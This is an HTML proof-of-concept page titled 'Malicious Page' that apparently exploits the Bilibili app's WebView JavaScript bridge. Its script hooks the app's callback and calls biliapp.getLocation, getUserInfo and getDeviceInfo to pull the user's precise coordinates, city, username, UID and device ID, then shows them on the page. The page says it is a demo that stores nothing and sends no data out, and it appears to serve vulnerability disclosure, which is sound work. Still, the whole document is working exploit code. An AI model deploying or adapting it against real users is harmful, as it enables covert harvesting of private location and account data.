<!DOCTYPE html>
<html>

<head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0" charset="UTF-8">
    <style>
        body {
            margin: 0;
            font-family: Arial, Helvetica, sans-serif;
        }

        .container {
            width: 100%;
            padding: 15px;
        }

        @media screen and (min-width: 700px) {
            .container {
                width: 70%;
                margin: auto;
            }
        }

        p {
            white-space: pre-wrap;
            word-wrap: break-word;
            overflow-wrap: break-word;
        }

        .bold-and-larger {
            font-weight: bold;
            font-size: 1.5em;
        }

        .larger {
            font-weight: bold;
            font-size: 1.2em;
        }
    </style>
    <title>Malicious Page</title>

</head>


<body>
    <h1>Malicious Page</h1>

    <p>!!! This is just a demo page, NO Sensitive Data will be stored!!!</p>

    <p><span class="bold-and-larger">An attacker can:</span></p>

    <p><span class="larger">Get Your Geolocation Info:</span></p>
    <p style="font-size: 15px;" id="PreciseLocation">Your Precise Location: </p>
    <p style="font-size: 15px;" id="City">Your City: </p>

    <p><span class="larger">Get Your Account Info:</span></p>
    <p style="font-size: 15px;" id="UserName">Your UserName: </p>
    <p style="font-size: 15px;" id="UID">Your UID: </p>

    <p><span class="larger">Get Your Device Info:</span></p>
    <p style="font-size: 15px;" id="DeviceID">Your DeviceID: </p>
    <p style="font-size: 15px;" id="DeviceType">Your DeviceType: </p>
   

    <script>

        window._biliapp = {};
        window._biliapp.callback = function (callback_id, retval) {
            switch (callback_id) {
                case "getLocationInfo":
                    var json = retval;

                    var city = json.location.cityName;
                    document.getElementById("City").innerText = "Your City: " + city;

                    var location = json.location.coordinate.coor;
                    document.getElementById("PreciseLocation").innerText = "Your Precise Location: " + "(" + location + ")";

                    break;

                case "callback_getUserInfo":
                    var json = retval;

                    var username = json.username;
                    document.getElementById("UserName").innerText = "Your UserName: " + username;

                    var uid = json.mid;
                    document.getElementById("UID").innerText = "Your UID: " + uid;

                    break;

                case "callback_getDeviceInfo":
                    var json = retval;

                    var deviceId = json.deviceId;
                    document.getElementById("DeviceID").innerText = "Your DeviceID: " + deviceId;

                    var device_type = json.device_type;
                    document.getElementById("DeviceType").innerText = "Your Type: " + device_type;

                    break;
            }
        }

        window.webkit.messageHandlers.biliInject.postMessage({
            method: "biliapp.getLocation",
            data: JSON.stringify({ type: 1 })
        });

        window.webkit.messageHandlers.biliInject.postMessage({
            method: "biliapp.getUserInfo",
            data: JSON.stringify({ callbackId: "callback_getUserInfo" })
        });

        window.webkit.messageHandlers.biliInject.postMessage({
            method: "biliapp.getDeviceInfo",
            data: JSON.stringify({ callbackId: "callback_getDeviceInfo" })
        });

    </script>

</body>

</html>